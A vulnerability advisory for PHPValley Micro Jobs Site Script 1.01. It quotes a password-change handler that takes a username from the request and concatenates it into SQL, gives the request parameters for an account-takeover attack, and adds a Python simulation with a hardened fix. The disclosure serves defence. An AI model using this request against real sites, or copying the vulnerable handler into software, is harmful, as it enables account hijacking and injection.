Author: Jason Whelan
PacketStorm: exploitdev
Email: exploitdevj@gmail.com
Target Software: PHPValley Micro Jobs Site Script 1.01
Vendor URL: http://phpvalley.com/
Demo: http://phpvalley.com/demo

Account Takeover Vulnerability

The password-change handler lets a logged-in user submit a new username together with the new password, and the script never checks that value. Setting the username to that of an existing member lets the attacker take over that member's account, including using or depositing the member's balance.

The vulnerability exists in php/change_pass_content.php:

    if (isset($_POST['changepass'])) {
        $cpass    = md5($_POST['cpass']);                 // current password, hashed as submitted
        $npass    = trim($_POST['npass']);                // new password
        $npassc   = trim($_POST['npassc']);               // new password, confirmation
        $username = trim(strtolower($_POST['auser']));    // attacker-controlled "new" username
        if ($npass == $npassc && !empty($npass)) {
            // The session user's row is renamed to whatever was sent in auser;
            // both values are concatenated straight into the statement.
            $query = "UPDATE members SET username='".$username."', password='".md5(strtolower($npass))."' where username='".$_SESSION['userName']."' and password='$cpass'";
            // ... the rest of the handler executes $query
        }
    }

The handler takes the new username straight from the POST body (auser) and writes it into the UPDATE without validating it or checking whether another member already uses it; the only constraint on which row is modified is the WHERE clause on the session user's current name and password hash. Because $username is also concatenated into the query unescaped, SQL injection might be possible as well, but the length is limited here. Note also that passwords are stored as unsalted MD5 of the lower-cased password.

Exploit:

The original exploit was an HTML form of which only the field labels survived extraction: "Target Username" and "Your Password". From the handler above, a working request is submitted while logged in to the attacker's own account, with changepass set, auser = the target's username, cpass = the attacker's own current password, and npass/npassc = the new password the attacker wants on the taken-over account.
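The following is an added example, not part of the original advisory or of the PHPValley script: it replays the handler's logic against a constructed in-memory SQLite table (standing in for the script's MySQL `members` table; the column set and the `login_lookup` check are assumptions) to show how the attacker's own row is renamed to the victim's username, and then shows a hardened variant that never takes the username from the request and binds its parameters.

```python
import hashlib
import sqlite3

# Constructed sample data (assumption: the real table has at least
# id, username, password and a balance column).
SEED_MEMBERS = [
    (1, "alice", "s3cret", 500),   # victim, holds a balance
    (2, "mallory", "hunter2", 0),  # attacker's own account
]


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, balance INTEGER)"
    )
    for uid, name, pw, bal in SEED_MEMBERS:
        # The script stores md5(strtolower(password)); usernames are lower-cased.
        conn.execute("INSERT INTO members VALUES (?,?,?,?)",
                     (uid, name, md5_hex(pw.lower()), bal))
    conn.commit()
    return conn


def vulnerable_change_pass(conn, session_username, post):
    """Mirror of change_pass_content.php: auser is trusted and concatenated."""
    cpass = md5_hex(post["cpass"])
    npass = post["npass"].strip()
    npassc = post["npassc"].strip()
    username = post["auser"].strip().lower()
    if npass == npassc and npass:
        query = ("UPDATE members SET username='" + username
                 + "', password='" + md5_hex(npass.lower())
                 + "' where username='" + session_username
                 + "' and password='" + cpass + "'")
        cur = conn.execute(query)
        conn.commit()
        return cur.rowcount  # rows renamed: the session user's own row
    return 0


def fixed_change_pass(conn, session_username, post):
    """Hardened variant: username is not updatable here, parameters are bound."""
    npass = post["npass"].strip()
    if npass != post["npassc"].strip() or not npass:
        return False
    cur = conn.execute(
        "UPDATE members SET password=? WHERE username=? AND password=?",
        (md5_hex(npass.lower()), session_username, md5_hex(post["cpass"])),
    )
    conn.commit()
    return cur.rowcount == 1


def login_lookup(conn, username, password):
    """Assumed login check: first row matching username + stored hash."""
    row = conn.execute(
        "SELECT id FROM members WHERE username=? AND password=?",
        (username.strip().lower(), md5_hex(password.lower())),
    ).fetchone()
    return row[0] if row else None


ATTACK_POST = {"auser": "alice", "cpass": "hunter2",
               "npass": "newpass", "npassc": "newpass"}


def demo_takeover():
    conn = make_db()
    renamed = vulnerable_change_pass(conn, "mallory", ATTACK_POST)
    names = [r[0] for r in conn.execute("SELECT username FROM members ORDER BY id")]
    # Two rows now carry the victim's name; logging in as alice/newpass hits Mallory's row.
    return renamed, names, login_lookup(conn, "alice", "newpass")


def demo_fixed():
    conn = make_db()
    ok = fixed_change_pass(conn, "mallory", ATTACK_POST)
    names = [r[0] for r in conn.execute("SELECT username FROM members ORDER BY id")]
    return ok, names, login_lookup(conn, "alice", "newpass"), login_lookup(conn, "mallory", "newpass")


if __name__ == "__main__":
    print("vulnerable:", demo_takeover())
    print("fixed:     ", demo_fixed())
```

The vulnerable path matches exactly one row (the attacker's, via the session name in the WHERE clause) but renames it to the victim's username, so any later lookup keyed on username can resolve to the attacker's row. The fixed variant keeps the WHERE clause, drops the username assignment entirely, and binds values instead of concatenating them, which also closes the injection avenue through auser.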